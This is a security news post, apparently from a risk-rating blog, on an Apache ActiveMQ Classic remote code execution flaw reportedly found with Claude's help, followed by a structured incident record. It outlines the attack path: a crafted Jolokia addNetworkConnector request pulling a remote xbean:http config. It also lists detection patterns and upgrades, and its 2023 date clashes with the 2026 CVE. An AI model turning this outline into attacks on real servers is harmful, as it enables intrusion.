• Home
  • cyber
  • Apache Software Foundation: Claude Discovers 13-Year-Old RCE Vulnerability in Apache ActiveMQ Within Minutes
cyber Vulnerability

Apache Software Foundation: Claude Discovers 13-Year-Old RCE Vulnerability in Apache ActiveMQ Within Minutes

Jan 1, 2023 3 min read
Apache Software Foundation: Claude Discovers 13-Year-Old RCE Vulnerability in Apache ActiveMQ Within Minutes

Critical 13-Year-Old RCE Flaw in Apache ActiveMQ Classic Discovered by AI

A newly disclosed remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has been uncovered after remaining hidden for over 13 years. The flaw was identified in just 10 minutes by an AI assistant, demonstrating the accelerating role of artificial intelligence in vulnerability research.

The vulnerability resides in ActiveMQ Classic’s web-based management console, which uses Jolokia, a REST API that exposes Java Management Extensions (JMX) operations. While Jolokia was restricted to read-only access following a 2023 vulnerability, developers maintained full access to ActiveMQ’s internal management components (MBeans) for functionality creating a critical security gap.

Attackers can exploit the flaw by sending a crafted request to the Jolokia API, abusing the addNetworkConnector operation to force the broker to download a malicious remote configuration file via the vm:// protocol. When processed, the broker retrieves and executes the file, granting attackers full system control. A malicious payload could include a xbean:http:// URL, triggering arbitrary code execution during connection setup.

Under normal conditions, exploitation requires administrative credentials (e.g., admin:admin). However, in ActiveMQ Classic versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) unintentionally removed authentication protections from the Jolokia API, turning CVE-2026-34197 into a zero-authentication RCE vulnerability.

The discovery was made by security researcher Naveen Sunkavally using Anthropic’s Claude AI model, which analyzed the codebase to identify exposed endpoints and historical vulnerabilities. The AI’s rapid analysis typically a weeks-long manual process highlights how AI is reshaping vulnerability research.

Given ActiveMQ’s history as a target for ransomware and advanced threat actors, organizations are advised to upgrade to versions 5.19.4 or 6.2.3, which remove risky vm:// transport usage in remote operations. Additional mitigations include changing default credentials, monitoring logs for suspicious vm:// URIs or brokerConfig=xbean:http patterns, and watching for unusual POST requests to /api/jolokia/ containing addNetworkConnector.

The incident underscores the risks of legacy code paths and the growing efficiency of AI-driven security research.

Source: https://cyberpress.org/claude-discovers-13-year-old-rce-vulnerability-in-apache-activemq-within-minutes/

The Apache Software Foundation cybersecurity rating report: https://www.rankiteo.com/company/the-apache-software-foundation

"id": "THE1775636935",
"linkid": "the-apache-software-foundation",
"type": "Vulnerability",
"date": "1/2023",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'customers_affected': 'Organizations using Apache '
                                              'ActiveMQ Classic versions 6.0.0 '
                                              'through 6.1.1 or those with '
                                              'default credentials',
                        'industry': 'Technology/Software Development',
                        'location': 'Global',
                        'name': 'Apache ActiveMQ Classic',
                        'type': 'Software'}],
 'attack_vector': 'Jolokia API (REST API for JMX operations)',
 'description': 'A newly disclosed remote code execution (RCE) vulnerability '
                'in Apache ActiveMQ Classic, tracked as CVE-2026-34197, has '
                'been uncovered after remaining hidden for over 13 years. The '
                'flaw was identified in just 10 minutes by an AI assistant, '
                'demonstrating the accelerating role of artificial '
                'intelligence in vulnerability research. The vulnerability '
                'resides in ActiveMQ Classic’s web-based management console, '
                'which uses Jolokia, a REST API that exposes Java Management '
                'Extensions (JMX) operations. Attackers can exploit the flaw '
                'by sending a crafted request to the Jolokia API, abusing the '
                '`addNetworkConnector` operation to force the broker to '
                'download a malicious remote configuration file via the '
                '`vm://` protocol, leading to arbitrary code execution.',
 'impact': {'brand_reputation_impact': 'Potential reputational damage due to '
                                       'exploitation by ransomware and '
                                       'advanced threat actors',
            'operational_impact': 'Full system control by attackers, potential '
                                  'for ransomware deployment or data '
                                  'exfiltration',
            'systems_affected': 'Apache ActiveMQ Classic versions 6.0.0 '
                                'through 6.1.1 (zero-authentication RCE) and '
                                'other versions with administrative access'},
 'initial_access_broker': {'entry_point': 'Jolokia API via crafted request to '
                                          '`addNetworkConnector`'},
 'investigation_status': 'Vulnerability disclosed, patches available',
 'lessons_learned': 'The incident underscores the risks of legacy code paths '
                    'and the growing efficiency of AI-driven security '
                    'research. It also highlights the importance of removing '
                    'unnecessary administrative functionalities and enforcing '
                    'strict authentication controls.',
 'post_incident_analysis': {'corrective_actions': ['Patching vulnerable '
                                                   'versions',
                                                   'Removing `vm://` transport '
                                                   'usage in remote operations',
                                                   'Enforcing strict '
                                                   'authentication controls'],
                            'root_causes': ['Legacy code path in Apache '
                                            'ActiveMQ Classic’s Jolokia API',
                                            'Unintended removal of '
                                            'authentication protections in '
                                            'versions 6.0.0 through 6.1.1 '
                                            '(CVE-2024-32114)',
                                            'Exposure of internal MBeans with '
                                            'full administrative access']},
 'recommendations': ['Upgrade to Apache ActiveMQ Classic versions 5.19.4 or '
                     '6.2.3 immediately',
                     'Change default credentials and enforce strong '
                     'authentication',
                     'Monitor logs for suspicious `vm://` URIs or '
                     '`brokerConfig=xbean:http` patterns',
                     'Watch for unusual POST requests to `/api/jolokia/` '
                     'containing `addNetworkConnector`',
                     'Consider AI-driven vulnerability research for legacy '
                     'codebases'],
 'references': [{'source': 'Security Research by Naveen Sunkavally'}],
 'response': {'containment_measures': 'Upgrade to versions 5.19.4 or 6.2.3, '
                                      'change default credentials, monitor '
                                      'logs for suspicious `vm://` URIs or '
                                      '`brokerConfig=xbean:http` patterns',
              'enhanced_monitoring': 'Monitor for unusual POST requests to '
                                     '`/api/jolokia/` containing '
                                     '`addNetworkConnector`',
              'remediation_measures': 'Remove risky `vm://` transport usage in '
                                      'remote operations, apply patches for '
                                      'CVE-2026-34197 and CVE-2024-32114'},
 'title': 'Critical 13-Year-Old RCE Flaw in Apache ActiveMQ Classic Discovered '
          'by AI',
 'type': 'Remote Code Execution (RCE)',
 'vulnerability_exploited': 'CVE-2026-34197 (13-year-old flaw in Apache '
                            'ActiveMQ Classic) and CVE-2024-32114 '
                            '(authentication bypass)'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.